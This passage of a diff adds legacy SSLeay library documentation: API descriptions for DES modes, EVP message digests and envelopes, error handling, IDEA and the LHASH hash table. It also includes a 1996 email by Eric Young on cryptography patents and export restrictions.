+	This routine sets a starting point for des_random_key().
+	
+void des_random_key(
+des_cblock ret);
+	This function return a random key.  Make sure to 'seed' the random
+	number generator (with des_random_seed()) before using this function.
+	I personally now use a MD5 based random number system.
+
+int des_enc_read(
+int fd,
+char *buf,
+int len,
+des_key_schedule ks,
+des_cblock *iv);
+	This function will write to a file descriptor the encrypted data
+	from buf.  This data will be preceded by a 4 byte 'byte count' and
+	will be padded out to 8 bytes.  The encryption is either CBC of
+	PCBC depending on the value of des_rw_mode.  If it is DES_PCBC_MODE,
+	pcbc is used, if DES_CBC_MODE, cbc is used.  The default is to use
+	DES_PCBC_MODE.
+
+int des_enc_write(
+int fd,
+char *buf,
+int len,
+des_key_schedule ks,
+des_cblock *iv);
+	This routines read stuff written by des_enc_read() and decrypts it.
+	I have used these routines quite a lot but I don't believe they are
+	suitable for non-blocking io.  If you are after a full
+	authentication/encryption over networks, have a look at SSL instead.
+
+unsigned long des_quad_cksum(
+des_cblock *input,
+des_cblock *output,
+long length,
+int out_count,
+des_cblock *seed);
+	This is a function from Kerberos v4 that is not anything to do with
+	DES but was needed.  It is a cksum that is quicker to generate than
+	des_cbc_cksum();  I personally would use MD5 routines now.
+=====
+Modes of DES
+Quite a bit of the following information has been taken from
+	AS 2805.5.2
+	Australian Standard
+	Electronic funds transfer - Requirements for interfaces,
+	Part 5.2: Modes of operation for an n-bit block cipher algorithm
+	Appendix A
+
+There are several different modes in which DES can be used, they are
+as follows.
+
+Electronic Codebook Mode (ECB) (des_ecb_encrypt())
+- 64 bits are enciphered at a time.
+- The order of the blocks can be rearranged without detection.
+- The same plaintext block always produces the same ciphertext block
+  (for the same key) making it vulnerable to a 'dictionary attack'.
+- An error will only affect one ciphertext block.
+
+Cipher Block Chaining Mode (CBC) (des_cbc_encrypt())
+- a multiple of 64 bits are enciphered at a time.
+- The CBC mode produces the same ciphertext whenever the same
+  plaintext is encrypted using the same key and starting variable.
+- The chaining operation makes the ciphertext blocks dependent on the
+  current and all preceding plaintext blocks and therefore blocks can not
+  be rearranged.
+- The use of different starting variables prevents the same plaintext
+  enciphering to the same ciphertext.
+- An error will affect the current and the following ciphertext blocks.
+
+Cipher Feedback Mode (CFB) (des_cfb_encrypt())
+- a number of bits (j) <= 64 are enciphered at a time.
+- The CFB mode produces the same ciphertext whenever the same
+  plaintext is encrypted using the same key and starting variable.
+- The chaining operation makes the ciphertext variables dependent on the
+  current and all preceding variables and therefore j-bit variables are
+  chained together and can not be rearranged.
+- The use of different starting variables prevents the same plaintext
+  enciphering to the same ciphertext.
+- The strength of the CFB mode depends on the size of k (maximal if
+  j == k).  In my implementation this is always the case.
+- Selection of a small value for j will require more cycles through
+  the encipherment algorithm per unit of plaintext and thus cause
+  greater processing overheads.
+- Only multiples of j bits can be enciphered.
+- An error will affect the current and the following ciphertext variables.
+
+Output Feedback Mode (OFB) (des_ofb_encrypt())
+- a number of bits (j) <= 64 are enciphered at a time.
+- The OFB mode produces the same ciphertext whenever the same
+  plaintext enciphered using the same key and starting variable.  More
+  over, in the OFB mode the same key stream is produced when the same
+  key and start variable are used.  Consequently, for security reasons
+  a specific start variable should be used only once for a given key.
+- The absence of chaining makes the OFB more vulnerable to specific attacks.
+- The use of different start variables values prevents the same
+  plaintext enciphering to the same ciphertext, by producing different
+  key streams.
+- Selection of a small value for j will require more cycles through
+  the encipherment algorithm per unit of plaintext and thus cause
+  greater processing overheads.
+- Only multiples of j bits can be enciphered.
+- OFB mode of operation does not extend ciphertext errors in the
+  resultant plaintext output.  Every bit error in the ciphertext causes
+  only one bit to be in error in the deciphered plaintext.
+- OFB mode is not self-synchronising.  If the two operation of
+  encipherment and decipherment get out of synchronism, the system needs
+  to be re-initialised.
+- Each re-initialisation should use a value of the start variable
+ different from the start variable values used before with the same
+ key.  The reason for this is that an identical bit stream would be
+ produced each time from the same parameters.  This would be
+ susceptible to a ' known plaintext' attack.
+
+Triple ECB Mode (des_ecb3_encrypt())
+- Encrypt with key1, decrypt with key2 and encrypt with key3 again.
+- As for ECB encryption but increases the key length to 168 bits.
+  There are theoretic attacks that can be used that make the effective
+  key length 112 bits, but this attack also requires 2^56 blocks of
+  memory, not very likely, even for the NSA.
+- If both keys are the same it is equivalent to encrypting once with
+  just one key.
+- If the first and last key are the same, the key length is 112 bits.
+  There are attacks that could reduce the key space to 55 bit's but it
+  requires 2^56 blocks of memory.
+- If all 3 keys are the same, this is effectively the same as normal
+  ecb mode.
+
+Triple CBC Mode (des_ede3_cbc_encrypt())
+- Encrypt with key1, decrypt with key2 and then encrypt with key3.
+- As for CBC encryption but increases the key length to 168 bits with
+  the same restrictions as for triple ecb mode.
+
+==== digest.doc ========================================================
+
+
+The Message Digest subroutines.
+
+These routines require "evp.h" to be included.
+
+These functions are a higher level interface to the various message digest
+routines found in this library.  As such, they allow the same code to be
+used to digest via different algorithms with only a change in an initial
+parameter.  They are basically just a front-end to the MD2, MD5, SHA
+and SHA1
+routines.
+
+These routines all take a pointer to the following structure to specify
+which message digest algorithm to use.
+typedef struct evp_md_st
+	{
+	int type;
+	int pkey_type;
+	int md_size;
+	void (*init)();
+	void (*update)();
+	void (*final)();
+
+	int required_pkey_type; /*EVP_PKEY_xxx */
+	int (*sign)();
+	int (*verify)();
+	} EVP_MD;
+
+If additional message digest algorithms are to be supported, a structure of
+this type needs to be declared and populated and then the Digest routines
+can be used with that algorithm.  The type field is the object NID of the
+digest type (read the section on Objects for an explanation).  The pkey_type
+is the Object type to use when the a message digest is generated by there
+routines and then is to be signed with the pkey algorithm.  Md_size is
+the size of the message digest returned.  Init, update
+and final are the relevant functions to perform the message digest function
+by parts.  One reason for specifying the message digest to use via this
+mechanism is that if you only use md5, only the md5 routines will
+be included in you linked program.  If you passed an integer
+that specified which message digest to use, the routine that mapped that
+integer to a set of message digest functions would cause all the message
+digests functions to be link into the code.  This setup also allows new
+message digest functions to be added by the application.
+
+The six message digests defined in this library are
+
+EVP_MD *EVP_md2(void);	/* RSA sign/verify */
+EVP_MD *EVP_md5(void);	/* RSA sign/verify */
+EVP_MD *EVP_sha(void);	/* RSA sign/verify */
+EVP_MD *EVP_sha1(void);	/* RSA sign/verify */
+EVP_MD *EVP_dss(void);	/* DSA sign/verify */
+EVP_MD *EVP_dss1(void);	/* DSA sign/verify */
+
+All the message digest routines take a EVP_MD_CTX pointer as an argument.
+The state of the message digest is kept in this structure.
+
+typedef struct pem_md_ctx_st
+	{
+	EVP_MD *digest;
+	union	{
+		unsigned char base[4]; /* this is used in my library as a
+					* 'pointer' to all union elements
+					* structures. */
+		MD2_CTX md2;
+		MD5_CTX md5;
+		SHA_CTX sha;
+		} md;
+	} EVP_MD_CTX;
+
+The Digest functions are as follows.
+
+void EVP_DigestInit(
+EVP_MD_CTX *ctx,
+EVP_MD *type);
+	This function is used to initialise the EVP_MD_CTX.  The message
+	digest that will associated with 'ctx' is specified by 'type'.
+
+void EVP_DigestUpdate(
+EVP_MD_CTX *ctx,
+unsigned char *data,
+unsigned int cnt);
+	This function is used to pass more data to the message digest
+	function.  'cnt' bytes are digested from 'data'.
+
+void EVP_DigestFinal(
+EVP_MD_CTX *ctx,
+unsigned char *md,
+unsigned int *len);
+	This function finishes the digestion and puts the message digest
+	into 'md'.  The length of the message digest is put into len;
+	EVP_MAX_MD_SIZE is the size of the largest message digest that
+	can be returned from this function.  Len can be NULL if the
+	size of the digest is not required.
+	
+
+==== encode.doc ========================================================
+
+
+void    EVP_EncodeInit(EVP_ENCODE_CTX *ctx);
+void    EVP_EncodeUpdate(EVP_ENCODE_CTX *ctx,unsigned char *out,
+		int *outl,unsigned char *in,int inl);
+void    EVP_EncodeFinal(EVP_ENCODE_CTX *ctx,unsigned char *out,int *outl);
+int     EVP_EncodeBlock(unsigned char *t, unsigned char *f, int n);
+
+void    EVP_DecodeInit(EVP_ENCODE_CTX *ctx);
+int     EVP_DecodeUpdate(EVP_ENCODE_CTX *ctx,unsigned char *out,int *outl,
+		unsigned char *in, int inl);
+int     EVP_DecodeFinal(EVP_ENCODE_CTX *ctx, unsigned
+		char *out, int *outl);
+int     EVP_DecodeBlock(unsigned char *t, unsigned
+		char *f, int n);
+
+
+==== envelope.doc ========================================================
+
+The following routines are use to create 'digital' envelopes.
+By this I mean that they perform various 'higher' level cryptographic
+functions.  Have a read of 'cipher.doc' and 'digest.doc' since those
+routines are used by these functions.
+cipher.doc contains documentation about the cipher part of the
+envelope library and digest.doc contatins the description of the
+message digests supported.
+
+To 'sign' a document involves generating a message digest and then encrypting
+the digest with an private key.
+
+#define EVP_SignInit(a,b)		EVP_DigestInit(a,b)
+#define EVP_SignUpdate(a,b,c)		EVP_DigestUpdate(a,b,c)
+Due to the fact this operation is basically just an extended message
+digest, the first 2 functions are macro calls to Digest generating
+functions.
+
+int     EVP_SignFinal(
+EVP_MD_CTX *ctx,
+unsigned char *md,
+unsigned int *s,
+EVP_PKEY *pkey);
+	This finalisation function finishes the generation of the message
+digest and then encrypts the digest (with the correct message digest 
+object identifier) with the EVP_PKEY private key.  'ctx' is the message digest
+context.  'md' will end up containing the encrypted message digest.  This
+array needs to be EVP_PKEY_size(pkey) bytes long.  's' will actually
+contain the exact length.  'pkey' of course is the private key.  It is
+one of EVP_PKEY_RSA or EVP_PKEY_DSA type.
+If there is an error, 0 is returned, otherwise 1.
+		
+Verify is used to check an signed message digest.
+
+#define EVP_VerifyInit(a,b)		EVP_DigestInit(a,b)
+#define EVP_VerifyUpdate(a,b,c)		EVP_DigestUpdate(a,b,c)
+Since the first step is to generate a message digest, the first 2 functions
+are macros.
+
+int EVP_VerifyFinal(
+EVP_MD_CTX *ctx,
+unsigned char *md,
+unsigned int s,
+EVP_PKEY *pkey);
+	This function finishes the generation of the message digest and then
+compares it with the supplied encrypted message digest.  'md' contains the
+'s' bytes of encrypted message digest.  'pkey' is used to public key decrypt
+the digest.  It is then compared with the message digest just generated.
+If they match, 1 is returned else 0.
+
+int	EVP_SealInit(EVP_CIPHER_CTX *ctx, EVP_CIPHER *type, unsigned char **ek,
+		int *ekl, unsigned char *iv, EVP_PKEY **pubk, int npubk);
+Must have at least one public key, error is 0.  I should also mention that
+the buffers pointed to by 'ek' need to be EVP_PKEY_size(pubk[n]) is size.
+
+#define EVP_SealUpdate(a,b,c,d,e)	EVP_EncryptUpdate(a,b,c,d,e)	
+void	EVP_SealFinal(EVP_CIPHER_CTX *ctx,unsigned char *out,int *outl);
+
+
+int	EVP_OpenInit(EVP_CIPHER_CTX *ctx,EVP_CIPHER *type,unsigned char *ek,
+		int ekl,unsigned char *iv,EVP_PKEY *priv);
+0 on failure
+
+#define EVP_OpenUpdate(a,b,c,d,e)	EVP_DecryptUpdate(a,b,c,d,e)
+
+int	EVP_OpenFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
+Decrypt final return code
+
+
+==== error.doc ========================================================
+
+The error routines.
+
+The 'error' system I've implemented is intended to server 2 purpose, to
+record the reason why a command failed and to record where in the libraries
+the failure occurred.  It is more or less setup to record a 'trace' of which
+library components were being traversed when the error occurred.
+
+When an error is recorded, it is done so a as single unsigned long which is
+composed of three parts.  The top byte is the 'library' number, the middle
+12 bytes is the function code, and the bottom 12 bits is the 'reason' code.
+
+Each 'library', or should a say, 'section' of the SSLeay library has a
+different unique 'library' error number.  Each function in the library has
+a number that is unique for that library.  Each 'library' also has a number
+for each 'error reason' that is only unique for that 'library'.
+
+Due to the way these error routines record a 'error trace', there is an
+array per thread that is used to store the error codes.
+The various functions in this library are used to access
+and manipulate this array.
+
+void ERR_put_error(int lib, int func,int reason);
+	This routine records an error in library 'lib', function 'func'
+and reason 'reason'.  As errors get 'put' into the buffer, they wrap
+around and overwrite old errors if too many are written.  It is assumed
+that the last errors are the most important.
+
+unsigned long ERR_get_error(void );
+	This function returns the last error added to the error buffer.
+In effect it is popping the value off the buffer so repeated calls will
+continue to return values until there are no more errors to return in which
+case 0 is returned.
+
+unsigned long ERR_peek_error(void );
+	This function returns the value of the last error added to the
+error buffer but does not 'pop' it from the buffer.
+
+void ERR_clear_error(void );
+	This function clears the error buffer, discarding all unread
+errors.
+
+While the above described error system obviously produces lots of different
+error number, a method for 'reporting' these errors in a human readable
+form is required.  To achieve this, each library has the option of
+'registering' error strings.
+
+typedef struct ERR_string_data_st
+	{
+	unsigned long error;
+	char *string;
+	} ERR_STRING_DATA;
+
+The 'ERR_STRING_DATA' contains an error code and the corresponding text
+string.  To add new function error strings for a library, the
+ERR_STRING_DATA needs to be 'registered' with the library.
+
+void ERR_load_strings(unsigned long lib,ERR_STRING_DATA *err);
+	This function 'registers' the array of ERR_STRING_DATA pointed to by
+'err' as error text strings for the error library 'lib'.
+
+void ERR_free_strings(void);
+	This function free()s all the loaded error strings.
+
+char *ERR_error_string(unsigned long error,char *buf);
+	This function returns a text string that is a human readable
+version of the error represented by 'error'.  Buff should be at least 120
+bytes long and if it is NULL, the return value is a pointer to a static
+variable that will contain the error string, otherwise 'buf' is returned.
+If there is not a text string registered for a particular error, a text
+string containing the error number is returned instead.
+
+void ERR_print_errors(BIO *bp);
+void ERR_print_errors_fp(FILE *fp);
+	This function is a convenience routine that prints the error string
+for each error until all errors have been accounted for.
+
+char *ERR_lib_error_string(unsigned long e);
+char *ERR_func_error_string(unsigned long e);
+char *ERR_reason_error_string(unsigned long e);
+The above three functions return the 3 different components strings for the
+error 'e'.  ERR_error_string() uses these functions.
+
+void ERR_load_ERR_strings(void );
+	This function 'registers' the error strings for the 'ERR' module.
+
+void ERR_load_crypto_strings(void );
+	This function 'register' the error strings for just about every
+library in the SSLeay package except for the SSL routines.  There is no
+need to ever register any error text strings and you will probably save in
+program size.  If on the other hand you do 'register' all errors, it is
+quite easy to determine why a particular routine failed.
+
+As a final footnote as to why the error system is designed as it is.
+1) I did not want a single 'global' error code.
+2) I wanted to know which subroutine a failure occurred in.
+3) For Windows NT etc, it should be simple to replace the 'key' routines
+   with code to pass error codes back to the application.
+4) I wanted the option of meaningful error text strings.
+
+Late breaking news - the changes to support threads.
+
+Each 'thread' has an 'ERR_STATE' state associated with it.
+ERR_STATE *ERR_get_state(void ) will return the 'state' for the calling
+thread/process.
+
+ERR_remove_state(unsigned long pid); will 'free()' this state.  If pid == 0
+the current 'thread/process' will have it's error state removed.
+If you do not remove the error state of a thread, this could be considered a
+form of memory leak, so just after 'reaping' a thread that has died,
+call ERR_remove_state(pid).
+
+Have a read of thread.doc for more details for what is required for
+multi-threading support.  All the other error routines will
+work correctly when using threads.
+
+
+==== idea.doc ========================================================
+
+The IDEA library.
+IDEA is a block cipher that operates on 64bit (8 byte) quantities.  It
+uses a 128bit (16 byte) key.  It can be used in all the modes that DES can
+be used.  This library implements the ecb, cbc, cfb64 and ofb64 modes.
+
+For all calls that have an 'input' and 'output' variables, they can be the
+same.
+
+This library requires the inclusion of 'idea.h'.
+
+All of the encryption functions take what is called an IDEA_KEY_SCHEDULE as an 
+argument.  An IDEA_KEY_SCHEDULE is an expanded form of the idea key.
+For all modes of the IDEA algorithm, the IDEA_KEY_SCHEDULE used for
+decryption is different to the one used for encryption.
+
+The define IDEA_ENCRYPT is passed to specify encryption for the functions
+that require an encryption/decryption flag. IDEA_DECRYPT is passed to
+specify decryption.  For some mode there is no encryption/decryption
+flag since this is determined by the IDEA_KEY_SCHEDULE.
+
+So to encrypt you would do the following
+idea_set_encrypt_key(key,encrypt_ks);
+idea_ecb_encrypt(...,encrypt_ks);
+idea_cbc_encrypt(....,encrypt_ks,...,IDEA_ENCRYPT);
+
+To Decrypt
+idea_set_encrypt_key(key,encrypt_ks);
+idea_set_decrypt_key(encrypt_ks,decrypt_ks);
+idea_ecb_encrypt(...,decrypt_ks);
+idea_cbc_encrypt(....,decrypt_ks,...,IDEA_DECRYPT);
+
+Please note that any of the encryption modes specified in my DES library
+could be used with IDEA.  I have only implemented ecb, cbc, cfb64 and
+ofb64 for the following reasons.
+- ecb is the basic IDEA encryption.
+- cbc is the normal 'chaining' form for block ciphers.
+- cfb64 can be used to encrypt single characters, therefore input and output
+  do not need to be a multiple of 8.
+- ofb64 is similar to cfb64 but is more like a stream cipher, not as
+  secure (not cipher feedback) but it does not have an encrypt/decrypt mode.
+- If you want triple IDEA, thats 384 bits of key and you must be totally
+  obsessed with security.  Still, if you want it, it is simple enough to
+  copy the function from the DES library and change the des_encrypt to
+  idea_encrypt; an exercise left for the paranoid reader :-).
+
+The functions are as follows:
+
+void idea_set_encrypt_key(
+unsigned char *key;
+IDEA_KEY_SCHEDULE *ks);
+	idea_set_encrypt_key converts a 16 byte IDEA key into an
+	IDEA_KEY_SCHEDULE.  The IDEA_KEY_SCHEDULE is an expanded form of
+	the key which can be used to perform IDEA encryption.
+	An IDEA_KEY_SCHEDULE is an expanded form of the key which is used to
+	perform actual encryption.  It can be regenerated from the IDEA key
+	so it only needs to be kept when encryption is about
+	to occur.  Don't save or pass around IDEA_KEY_SCHEDULE's since they
+	are CPU architecture dependent, IDEA keys are not.
+	
+void idea_set_decrypt_key(
+IDEA_KEY_SCHEDULE *encrypt_ks,
+IDEA_KEY_SCHEDULE *decrypt_ks);
+	This functions converts an encryption IDEA_KEY_SCHEDULE into a
+	decryption IDEA_KEY_SCHEDULE.  For all decryption, this conversion
+	of the key must be done.  In some modes of IDEA, an
+	encryption/decryption flag is also required, this is because these
+	functions involve block chaining and the way this is done changes
+	depending on which of encryption of decryption is being done.
+	Please note that there is no quick way to generate the decryption
+	key schedule other than generating the encryption key schedule and
+	then converting it.
+
+void idea_encrypt(
+unsigned long *data,
+IDEA_KEY_SCHEDULE *ks);
+	This is the IDEA encryption function that gets called by just about
+	every other IDEA routine in the library.  You should not use this
+	function except to implement 'modes' of IDEA.  I say this because the
+	functions that call this routine do the conversion from 'char *' to
+	long, and this needs to be done to make sure 'non-aligned' memory
+	access do not occur.
+	Data is a pointer to 2 unsigned long's and ks is the
+	IDEA_KEY_SCHEDULE to use.  Encryption or decryption depends on the
+	IDEA_KEY_SCHEDULE.
+
+void idea_ecb_encrypt(
+unsigned char *input,
+unsigned char *output,
+IDEA_KEY_SCHEDULE *ks);
+	This is the basic Electronic Code Book form of IDEA (in DES this
+	mode is called Electronic Code Book so I'm going to use the term
+	for idea as well :-).
+	Input is encrypted into output using the key represented by
+	ks.  Depending on the IDEA_KEY_SCHEDULE, encryption or
+	decryption occurs.  Input is 8 bytes long and output is 8 bytes.
+	
+void idea_cbc_encrypt(
+unsigned char *input,
+unsigned char *output,
+long length,
+IDEA_KEY_SCHEDULE *ks,
+unsigned char *ivec,
+int enc);
+	This routine implements IDEA in Cipher Block Chaining mode.
+	Input, which should be a multiple of 8 bytes is encrypted
+	(or decrypted) to output which will also be a multiple of 8 bytes.
+	The number of bytes is in length (and from what I've said above,
+	should be a multiple of 8).  If length is not a multiple of 8, bad 
+	things will probably happen.  ivec is the initialisation vector.
+	This function updates iv after each call so that it can be passed to
+	the next call to idea_cbc_encrypt().
+	
+void idea_cfb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+des_key_schedule ks,
+des_cblock *ivec,
+int *num,
+int enc);
+	This is one of the more useful functions in this IDEA library, it
+	implements CFB mode of IDEA with 64bit feedback.
+	This allows you to encrypt an arbitrary number of bytes,
+	you do not require 8 byte padding.  Each call to this
+	routine will encrypt the input bytes to output and then update ivec
+	and num.  Num contains 'how far' we are though ivec.
+	Enc is used to indicate encryption or decryption.
+	One very important thing to remember is that when decrypting, use
+	the encryption form of the key.
+	CFB64 mode operates by using the cipher to
+	generate a stream of bytes which is used to encrypt the plain text.
+	The cipher text is then encrypted to generate the next 64 bits to
+	be xored (incrementally) with the next 64 bits of plain
+	text.  As can be seen from this, to encrypt or decrypt,
+	the same 'cipher stream' needs to be generated but the way the next
+	block of data is gathered for encryption is different for
+	encryption and decryption.  What this means is that to encrypt
+	idea_set_encrypt_key(key,ks);
+	idea_cfb64_encrypt(...,ks,..,IDEA_ENCRYPT)
+	do decrypt
+	idea_set_encrypt_key(key,ks)
+	idea_cfb64_encrypt(...,ks,...,IDEA_DECRYPT)
+	Note: The same IDEA_KEY_SCHEDULE but different encryption flags.
+	For idea_cbc or idea_ecb, idea_set_decrypt_key() would need to be
+	used to generate the IDEA_KEY_SCHEDULE for decryption.
+	The reason I'm stressing this point is that I just wasted 3 hours
+	today trying to decrypt using this mode and the decryption form of
+	the key :-(.
+	
+void idea_ofb64_encrypt(
+unsigned char *in,
+unsigned char *out,
+long length,
+des_key_schedule ks,
+des_cblock *ivec,
+int *num);
+	This functions implements OFB mode of IDEA with 64bit feedback.
+	This allows you to encrypt an arbitrary number of bytes,
+	you do not require 8 byte padding.  Each call to this
+	routine will encrypt the input bytes to output and then update ivec
+	and num.  Num contains 'how far' we are though ivec.
+	This is in effect a stream cipher, there is no encryption or
+	decryption mode.  The same key and iv should be used to
+	encrypt and decrypt.
+	
+For reading passwords, I suggest using des_read_pw_string() from my DES library.
+To generate a password from a text string, I suggest using MD5 (or MD2) to
+produce a 16 byte message digest that can then be passed directly to
+idea_set_encrypt_key().
+
+=====
+For more information about the specific IDEA modes in this library
+(ecb, cbc, cfb and ofb), read the section entitled 'Modes of DES' from the
+documentation on my DES library.  What is said about DES is directly
+applicable for IDEA.
+
+
+==== legal.doc ========================================================
+
+From eay@mincom.com Thu Jun 27 00:25:45 1996
+Received: by orb.mincom.oz.au id AA15821
+  (5.65c/IDA-1.4.4 for eay); Wed, 26 Jun 1996 14:25:45 +1000
+Date: Wed, 26 Jun 1996 14:25:45 +1000 (EST)
+From: Eric Young <eay@mincom.oz.au>
+X-Sender: eay@orb
+To: Ken Toll <ktoll@ren.digitalage.com>
+Cc: Eric Young <eay@mincom.oz.au>, ssl-talk@netscape.com
+Subject: Re: Unidentified subject!
+In-Reply-To: <9606261950.ZM28943@ren.digitalage.com>
+Message-Id: <Pine.SOL.3.91.960626131156.28573K-100000@orb>
+Mime-Version: 1.0
+Content-Type: TEXT/PLAIN; charset=US-ASCII
+Status: O
+X-Status: 
+
+
+This is a little off topic but since SSLeay is a free implementation of
+the SSLv2 protocol, I feel it is worth responding on the topic of if it 
+is actually legal for Americans to use free cryptographic software.
+
+On Wed, 26 Jun 1996, Ken Toll wrote:
+> Is the U.S the only country that SSLeay cannot be used commercially 
+> (because of RSAref) or is that going to be an issue with every country 
+> that a client/server application (non-web browser/server) is deployed 
+> and sold?
+
+>From what I understand, the software patents that apply to algorithms 
+like RSA and DH only apply in the USA.  The IDEA algorithm I believe is 
+patened in europe (USA?), but considing how little it is used by other SSL 
+implementations, it quite easily be left out of the SSLeay build
+(this can be done with a compile flag).
+
+Actually if the RSA patent did apply outside the USA, it could be rather
+interesting since RSA is not alowed to let RSA toolkits outside of the USA
+[1], and since these are the only forms that they will alow the algorithm
+to be used in, it would mean that non-one outside of the USA could produce
+public key software which would be a very strong statment for
+international patent law to make :-).  This logic is a little flawed but
+it still points out some of the more interesting permutations of USA
+patent law and ITAR restrictions. 
+
+Inside the USA there is also the unresolved issue of RC4/RC2 which were
+made public on sci.crypt in Sep 1994 (RC4) and Feb 1996 (RC2).  I have
+copies of the origional postings if people are interested.  RSA I believe 
+claim that they were 'trade-secrets' and that some-one broke an NDA in 
+revealing them.  Other claim they reverse engineered the algorithms from 
+compiled binaries.  If the algorithms were reverse engineered, I believe 
+RSA had no legal leg to stand on.  If an NDA was broken, I don't know.
+Regardless, RSA, I believe, is willing to go to court over the issue so 
+licencing is probably the best idea, or at least talk to them.
+If there are people who actually know more about this, pease let me know, I 
+don't want to vilify or spread miss-information if I can help it.
+
+If you are not producing a web browser, it is easy to build SSLeay with
+RC2/RC4 removed. Since RC4 is the defacto standard cipher in 
+all web software (and it is damn fast) it is more or less required for 
+www use. For non www use of SSL, especially for an application where 
+interoperability with other vendors is not critical just leave it out.
+
+Removing IDEA, RC2 and RC4 would only leave DES and Triple DES but 
+they should be ok.  Considing that Triple DES can encrypt at rates of
+410k/sec on a pentium 100, and 940k/sec on a P6/200, this is quite 
+reasonable performance.  Single DES clocks in at 1160k/s and 2467k/s
+respectivly is actually quite fast for those not so paranoid (56 bit key).[1]
+
+> Is it possible to get a certificate for commercial use outside of the U.S.?
+yes.
+
+Thawte Consulting issues certificates (they are the people who sell the
+	Sioux httpd server and are based in South Africa)
+Verisign will issue certificates for Sioux (sold from South Africa), so this
+	proves that they will issue certificate for OS use if they are
+	happy with the quality of the software.
+
+(The above mentioned companies just the ones that I know for sure are issuing
+ certificates outside the USA).
+
+There is always the point that if you are using SSL for an intra net, 
+SSLeay provides programs that can be used so you can issue your own 
+certificates.  They need polishing but at least it is a good starting point.
+
+I am not doing anything outside Australian law by implementing these
+algorithms (to the best of my knowedge).  It is another example of how 
+the world legal system does not cope with the internet very well.
+
+I may start making shared libraries available (I have now got DLL's for 
+Windows).  This will mean that distributions into the usa could be 
+shipped with a version with a reduced cipher set and the versions outside 
+could use the DLL/shared library with all the ciphers (and without RSAref).
+
+This could be completly hidden from the application, so this would not 
+even require a re-linking.
+
+This is the reverse of what people were talking about doing to get around 
+USA export regulations :-)
+
+eric
+
+[1]:	The RSAref2.0 tookit is available on at least 3 ftp sites in Europe
+	and one in South Africa.
+
+[2]:	Since I always get questions when I post benchmark numbers :-),
+	DES performace figures are in 1000's of bytes per second in cbc 
+	mode using an 8192 byte buffer.  The pentium 100 was running Windows NT 
+	3.51 DLLs and the 686/200 was running NextStep.
+	I quote pentium 100 benchmarks because it is basically the
+	'entry level' computer that most people buy for personal use.
+	Windows 95 is the OS shipping on those boxes, so I'll give
+	NT numbers (the same Win32 runtime environment).  The 686
+	numbers are present as an indication of where we will be in a
+	few years.
+--
+Eric Young                  | BOOL is tri-state according to Bill Gates.
+AARNet: eay@mincom.oz.au    | RTFM Win32 GetMessage().
+
+
+
+==== lhash.doc ========================================================
+
+The LHASH library.
+
+I wrote this library in 1991 and have since forgotten why I called it lhash.
+It implements a hash table from an article I read at the
+time from 'Communications of the ACM'.  What makes this hash
+table different is that as the table fills, the hash table is
+increased (or decreased) in size via realloc().
+When a 'resize' is done, instead of all hashes being redistributed over
+twice as many 'buckets', one bucket is split.  So when an 'expand' is done,
+there is only a minimal cost to redistribute some values.  Subsequent
+inserts will cause more single 'bucket' redistributions but there will
+never be a sudden large cost due to redistributing all the 'buckets'.
+
+The state for a particular hash table is kept in the LHASH structure.
+The LHASH structure also records statistics about most aspects of accessing
+the hash table.  This is mostly a legacy of my writing this library for
+the reasons of implementing what looked like a nice algorithm rather than
+for a particular software product.
+
+Internal stuff you probably don't want to know about.
+The decision to increase or decrease the hash table size is made depending
+on the 'load' of the hash table.  The load is the number of items in the
+hash table divided by the size of the hash table.  The default values are
+as follows.  If (hash->up_load < load) => expand.
+if (hash->down_load > load) =>  contract.  The 'up_load' has a default value of
+1 and 'down_load' has a default value of 2.  These numbers can be modified
+by the application by just playing with the 'up_load' and 'down_load'
+variables.  The 'load' is kept in a form which is multiplied by 256.  So
+hash->up_load=8*256; will cause a load of 8 to be set.
+
+If you are interested in performance the field to watch is
+num_comp_calls.  The hash library keeps track of the 'hash' value for
+each item so when a lookup is done, the 'hashes' are compared, if
+there is a match, then a full compare is done, and
+hash->num_comp_calls is incremented.  If num_comp_calls is not equal
+to num_delete plus num_retrieve it means that your hash function is
+generating hashes that are the same for different values.  It is
+probably worth changing your hash function if this is the case because
+even if your hash table has 10 items in a 'bucked', it can be searched
+with 10 'unsigned long' compares and 10 linked list traverses.  This
+will be much less expensive that 10 calls to you compare function.
+
+LHASH *lh_new(
+unsigned long (*hash)(),
+int (*cmp)());
+	This function is used to create a new LHASH structure.  It is passed
+	function pointers that are used to store and retrieve values passed
+	into the hash table.  The 'hash'
+	function is a hashing function that will return a hashed value of
+	it's passed structure.  'cmp' is passed 2 parameters, it returns 0
+	is they are equal, otherwise, non zero.
+	If there are any problems (usually malloc failures), NULL is
+	returned, otherwise a new LHASH structure is returned.  The
+	hash value is normally truncated to a power of 2, so make sure
+	that your hash function returns well mixed low order bits.
+	
+void lh_free(
+LHASH *lh);
+	This function free()s a LHASH structure.  If there is malloced
+	data in the hash table, it will not be freed.  Consider using the
+	lh_doall function to deallocate any remaining entries in the hash
+	table.
+	
+char *lh_insert(
+LHASH *lh,
+char *data);
+	This function inserts the data pointed to by data into the lh hash
+	table.  If there is already and entry in the hash table entry, the
+	value being replaced is returned.  A NULL is returned if the new
+	entry does not clash with an entry already in the table (the normal
+	case) or on a malloc() failure (perhaps I should change this....).
+	The 'char *data' is exactly what is passed to the hash and
+	comparison functions specified in lh_new().
+	
+char *lh_delete(
+LHASH *lh,
+char *data);
+	This routine deletes an entry from the hash table.  The value being
+	deleted is returned.  NULL is returned if there is no such value in
+	the hash table.
+
+char *lh_retrieve(
+LHASH *lh,
+char *data);
+	If 'data' is in the hash table it is returned, else NULL is
+	returned.  The way these routines would normally be uses is that a
+	dummy structure would have key fields populated and then
+	ret=lh_retrieve(hash,&dummy);.  Ret would now be a pointer to a fully
+	populated structure.
+
+void lh_doall(
+LHASH *lh,
+void (*func)(char *a));
+	This function will, for every entry in the hash table, call function
+	'func' with the data item as parameters.
+	This function can be quite useful when used as follows.
+	void cleanup(STUFF *a)
+		{ STUFF_free(a); }
+	lh_doall(hash,cleanup);
+	lh_free(hash);
+	This can be used to free all the entries, lh_free() then
+	cleans up the 'buckets' that point to nothing.  Be careful
+	when doing this.  If you delete entries from the hash table,
+	in the call back function, the table may decrease in size,
+	moving item that you are
+	currently on down lower in the hash table.  This could cause
+	some entries to be skipped.  The best solution to this problem
+	is to set lh->down_load=0 before you start.  This will stop
+	the hash table ever being decreased in size.
+
+void lh_doall_arg(
+LHASH *lh;
+void(*func)(char *a,char *arg));
+char *arg;
+	This function is the same as lh_doall except that the function
